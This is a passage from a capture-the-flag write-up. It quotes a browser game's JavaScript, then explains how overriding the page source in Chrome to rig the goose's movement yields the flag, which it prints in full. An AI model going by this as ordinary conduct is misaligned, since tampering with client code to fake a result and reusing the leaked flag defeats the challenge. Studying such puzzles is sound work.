false; } data_idx += 8; let num = 0; let cnter = 1; for (let i = data_idx; i < data_idx + 8; i++) { num += cnter * resp[i]; cnter *= 0x100; } data_idx += 8; winner.score = num; num = 0; cnter = 1; for (let i = data_idx; i < data_idx + 4; i++) { num += cnter * resp[i]; cnter *= 0x100; } data_idx += 4; len = num; let winnerName = ""; for (let i = data_idx; i < data_idx + len; i++) { winnerName += String.fromCharCode(resp[i]); } winner.name = winnerName; return true; } catch (e) { log("error"); log(": " + e.stack); } }</script> ``` Immediately, we can see that the main logic of the program is contained within the `<script>` tags. Notably, we see how to win here: ```jsif (score === 9) log("flag: dice{pr0_duck_gam3r_" + encode(history) + "}");``` However, if you played the game, you would know that the score variable refers to the number of moves the player made to catch the "goose". Unfortunately, it's clear that 9 moves is near impossible, as it would require the goose to move left 8 times in a row, i.e. a 1/4**8 = 1/65536 chance. So how can we get to 9 moves? We could calculate the resultant array for `history` and put it in to the encode function to get our answer, but we can do something even nicer! On Chrome, by right-clicking on the source file and hitting "Override content", we can change the source code of the site and run it in our browser! This allows us to modify the code that controls the goose's movement to this: ```jsdo { nxt = [goose[0], goose[1]]; nxt[1]--;} while (!isValid(nxt));``` This ensures that the goose only moves right. Save the file, reload the page, and move down 9 times. Check the console and get the flag! dice{pr0_duck_gam3r_AAEJCQEBCQgCAQkHAwEJBgQBCQUFAQkEBgEJAwcBCQIIAQkB}